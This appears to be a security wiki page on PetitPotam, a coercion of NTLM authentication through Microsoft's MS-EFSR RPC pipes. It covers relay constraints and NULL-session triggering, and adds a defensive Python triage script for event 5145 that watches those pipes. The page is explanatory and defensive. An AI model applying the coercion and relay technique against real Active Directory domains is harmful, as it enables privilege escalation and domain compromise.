MS-EFSR abuse (PetitPotam)


MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network, and is available as an RPC interface. That interface is reachable through the \pipe\efsrpc, \pipe\lsarpc, \pipe\samr, \pipe\lsass and \pipe\netlogon SMB named pipes.
In 2019, Google's Project Zero research team found and reported a bug in MS-EFSR that could be combined with an NTLM Reflection attack, leading to a Local Privilege Elevation. An insufficient path check in MS-EFSR's EfsRpcOpenFileRaw method allowed attackers to force the SYSTEM account into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.
While the wider implications of this bug, AD-DS-wise, were only suspected, Gilles LIONEL used it in 2021 to remotely coerce authentication from domain-joined machines.
At the time of writing (08/11/2021), this bug has not been fully addressed by Microsoft.


An authentication can be forced with the original author's proofs of concept, dubbed "PetitPotam" (available in C and Python), by using a valid AD account's credentials.
Nota bene: the coerced NTLM authentication will be made through SMB. This is important because it restricts the possibilities of NTLM relay. For instance, an "unsigning cross-protocols relay attack" from SMBv2 to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.
Some tests conducted in lab environments showed that, unlike the MS-RPRN abuse (printbug), a NULL session could potentially be used to trigger that bug (if allowed by the target). This has only been verified to be working on Windows Server 2016 and Windows Server 2019 Domain Controllers.
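
For defenders, the pipe list and the NULL-session observation above translate into a triage rule over Windows Security event 5145 (detailed file share auditing). The following is an added example, not code from the original page or from the PetitPotam project. It assumes that audit category is enabled, that events have been exported as dictionaries keyed by the event's field names, and that remote use of the efsrpc pipe is rare in the environment; the sample records are constructed.

```python
from collections import defaultdict

# Named pipes the page lists as exposing the MS-EFSR interface.
EFSR_PIPES = {"efsrpc", "lsarpc", "samr", "lsass", "netlogon"}
RANK = {"medium": 1, "high": 2}

def classify(ev):
    """Return a severity for one event 5145 record, or None if not relevant."""
    if ev.get("EventID") != 5145:
        return None
    if not ev.get("ShareName", "").upper().endswith("IPC$"):
        return None
    pipe = ev.get("RelativeTargetName", "").lower()
    if pipe not in EFSR_PIPES:
        return None
    if pipe == "efsrpc":
        # Assumption: this host has no routine remote clients of this pipe.
        return "high"
    if ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON":
        # NULL session reaching one of the shared RPC pipes.
        return "medium"
    # Authenticated lsarpc/samr/lsass/netlogon access is routine domain traffic.
    return None

def triage(events):
    """Group hits by (source IP, target host), keeping the highest severity."""
    out = defaultdict(lambda: {"severity": "medium", "pipes": set()})
    for ev in events:
        sev = classify(ev)
        if sev is None:
            continue
        hit = out[(ev["IpAddress"], ev["Computer"])]
        hit["pipes"].add(ev["RelativeTargetName"].lower())
        if RANK[sev] > RANK[hit["severity"]]:
            hit["severity"] = sev
    return dict(out)

def ev5145(host, ip, user, share, target):
    """Build a constructed 5145 record (hypothetical helper for the sample)."""
    return {"EventID": 5145, "Computer": host, "IpAddress": ip,
            "SubjectUserName": user, "ShareName": share,
            "RelativeTargetName": target}

# Constructed sample records; hosts, users and addresses are made up.
SAMPLE = [
    ev5145("DC01", "10.0.0.50", "ANONYMOUS LOGON", r"\\*\IPC$", "lsarpc"),
    ev5145("DC01", "10.0.0.50", "jdoe", r"\\*\IPC$", "efsrpc"),
    ev5145("DC01", "10.0.0.66", "ANONYMOUS LOGON", r"\\*\IPC$", "lsarpc"),
    ev5145("DC01", "10.0.0.20", "alice", r"\\*\IPC$", "samr"),
    ev5145("DC01", "10.0.0.20", "alice", r"\\*\SYSVOL", "Policies"),
]
```

Authenticated access to lsarpc, samr, lsass and netlogon is deliberately not flagged, so a coercion attempt made with valid credentials over one of those pipes will not appear in this output and needs correlation with other telemetry.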


Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation
Exploit Database
GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.